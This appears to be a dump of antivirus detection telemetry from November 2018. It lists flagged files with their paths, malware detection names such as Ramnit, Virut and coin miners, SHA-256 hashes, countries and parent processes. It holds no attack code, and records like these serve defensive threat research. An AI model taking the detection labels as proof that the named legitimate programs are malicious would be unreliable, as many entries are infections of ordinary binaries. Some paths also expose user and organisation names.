  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-01T16:39:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tnhfwsrw.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\TNhFwsrw.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='collect2.exe', filepath='\\\\?\\C:\\Program Files (x86)\\CodeBlocks\\MinGW\\libexec\\gcc\\mingw32\\5.1.0\\collect2.exe', filesize=512000, name='W32/Neshta.A.#M1.#R1'), hash='8deea902fa6e72b14cc54d60270f6119720aa4512f2dc898cebf0de4c0f8897e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:41:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='package_764_xml.js.zip', filepath='F:\\Backup\\LwD\\Praxis\\DConcept\\HtmlHelp\\XCONCEPT_HILFE\\WHXDATA\\PACKAGE_764_XML.JS.zip', filesize=4000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='c379a71d8903b9ec14591bdb3e85716dcd3cbf55fef97fa614f787c2878b2b7a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\PersBackup\\\\\\\\Tägliche Sicherung.buj\\\\\\" \\\\\\/force \\\\\\/hide \\\\\\/wait:3', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10482688, timestamp='2018-11-01T20:22:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gsdx32-sse4.dll', filepath='C:\\Users\\X\\Downloads\\pcsx2-v1.5.0-dev-2014-gb2a2a3a-windows-x86\\plugins\\GSdx32-SSE4.dll', filesize=2432000, name='W32/Ramnit.CD.#M1.#R1'), hash='e5c29a5aecab775d5e3321bd1499395d2cf38aedb326c533f348cc275a0a5ff2', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-01T15:05:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211555-9c05d275', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211555-9C05D275', filesize=3904000, name='HEUR/AGEN.1033264.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{07D3CB25-7F85-41AB-823A-1A37E2FE5C1D}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='d316f0bd11ab26a84824a6a72f555b5ee2236cb231251c67590600f3765bb70d', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apprendisti.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\APPRENDISTI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='verbi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO\\esercitazioni\\VERBI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='.fseventsd.exe', filepath='H:\\.fseventsd.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.15063.0_none_e6376d51f3e7328e\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:32:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-131535-2aed2127', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131535-2AED2127', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline='-Embedding', country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\RuntimeBroker.exe', parentsize=None, timestamp='2018-11-04T22:41:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nifel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nifel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='592052d52cee31b744f49919df3d9d4f6fe11e7a6f5d6b1ba6a08a660ae6feb4', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:43:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215649-e79511db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-215649-E79511DB', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:56:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T23:21:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T10:48:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keystone.exe', filepath='C:\\DRIVERS\\Video\\nVIDIA\\18208\\keystone.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='a543cdba8fdd41261cc4a23531592e0e74f3c9c52f5af73b70e2380b53b50376', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Download Manager\\IEMonitor.exe', parentsize=353336, timestamp='2018-11-04T10:33:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libegl.dll', filepath='C:\\Program Files (x86)\\crxbro Browser\\crxbro\\libegl.dll', filesize=80000, name='TR/Ghokswa.bbago.#M1.#R1'), hash='608157045d1092d1192901f7476b7aaabdd1237ef69ac4539c0ed85b7a374921', metadata=Row(cmdline='\\\\\\/Q \\\\\\/W', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\MRT.exe', parentsize=None, timestamp='2018-11-04T11:41:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mssys.exe', filepath='C:\\Windows\\System\\sys\\syscon\\mssys.exe', filesize=1024000, name='APPL/EAMonitor.44e66f.#M1.#R1'), hash='44e66fc342c4470a94caa04d3c0530327391e07636707f007987849a7429dd2c', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System\\sys\\syscon\\mssys.exe', parentsize=1024000, timestamp='2018-11-04T00:02:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:45:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\Shaan\\AppData\\Local\\Temp\\tmp8179755\\MNNStubSetup.exe', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='8', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:19:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe748_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe748 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T23:58:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203712-bfc4352e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_356d35e0\\AVSCAN-20181104-203652-BC5D3FE2\\AVSCAN-20181104-203712-BFC4352E', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:37:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T09:10:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173258-32539d2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173258-32539D2F', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:20:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sorted_group_d3e20.htm', filepath='\\\\?\\D:\\Autodesk\\AutoCAD Structural Detailing 2012 - English\\Help\\filesACR\\sorted_group_d3e20.htm', filesize=236000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='abb76e8598594c9d6ec6de5df13067e72b84b457301b29f5ef27ac1ab2fc7bb0', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:49:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hpqtax08.exe', filepath='\\\\?\\C:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\hpqtax08.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='89fe18d1d7110afde9190fa85bfb44d9a09e8a9dab2f07bbc087447df2dc8486', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:06:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='installs.exe', filepath='E:\\sw2014x64bit\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='839c19149a37cc63e62db446f80313ca033a58ea062366e999f10769d1aa99b8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:m16O5rkNlkayFv9Z.1', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T12:42:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cloudbackup5892.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\CloudBackup5892.exe', filesize=5600000, name='PUA/MyPCBackup.Gen.#M300.#R5908'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='MQ', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:03:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cfp.exe', filepath='C:\\Users\\X\\Desktop\\Miracle Box crack 2.54 free 2018\\Miracle Box crack 2.54 free 2018\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='4aa835632e3b4fbe2f82441f5e38bb1cad962cf0569cf46b1344fc3bb2a0642c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T13:07:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5079957\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Downloads\\mpcstar_setup.exe', parentsize=35237816, timestamp='2018-11-04T14:06:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135104-2d7a8cc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b2055eb\\AVSCAN-20181104-134144-E9320359\\AVSCAN-20181104-135104-2D7A8CC9', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:49:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000017c', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000017c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:58:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='.spotlight-v100.exe', filepath='G:\\.Spotlight-V100.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:14:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T09:36:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f86c3', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f86c3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0005422.exe', filepath='d:\\system volume information\\_restore{51d20475-b19b-4e6a-8fc3-a60e80bdc71c}\\rp12\\A0005422.exe', filesize=3200000, name='W32/Neshta.A.#M1.#R1'), hash='752e0f38a9db15c110bb90d372283e83aa56259ca3b6075f5544458f0c0be0e2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:14:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ethdcrminer64.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-153897562-1265273997-1534562455-1001\\$R31G5FB.3\\cuda7.5\\EthDcrMiner64.exe', filesize=5696000, name='HEUR/AGEN.1033248.#M1.#R1'), hash='caac48aa46538bc5815b44512a284c41de7a293e9bcc27ff64aef7e3c7622ec7', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:19:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:07:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1575608b.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1575608b.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='57fd5e156e5ab649ffd1a645a2d0171e353e057050f1ea07d8fe511f62779058', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:27:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:44:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212138-505cf3b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01434177\\AVSCAN-20181104-210731-0BCFB3D0\\AVSCAN-20181104-212138-505CF3B7', filesize=1280000, name='TR/Tiggre.cpqdk.#M1.#R1'), hash='75d5db0cca3fe3bbe1e17cc2c94b8fe379ecc84638c8bd6a6d180ca022f21333', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104236-df518fc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_041bd71c\\AVSCAN-20181104-103148-6708B220\\AVSCAN-20181104-104236-DF518FC7', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9a9e6683d5460ea4f6716b72b56ca888d7b455d36a42c69a01ed947adb0f0c9f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:49:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172925-cc81531e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85adc6b7\\AVSCAN-20181104-172748-C40F4DF5\\AVSCAN-20181104-172925-CC81531E', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:28:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:43:06Z'), dt=datetime.date(2018, 11, 4)),
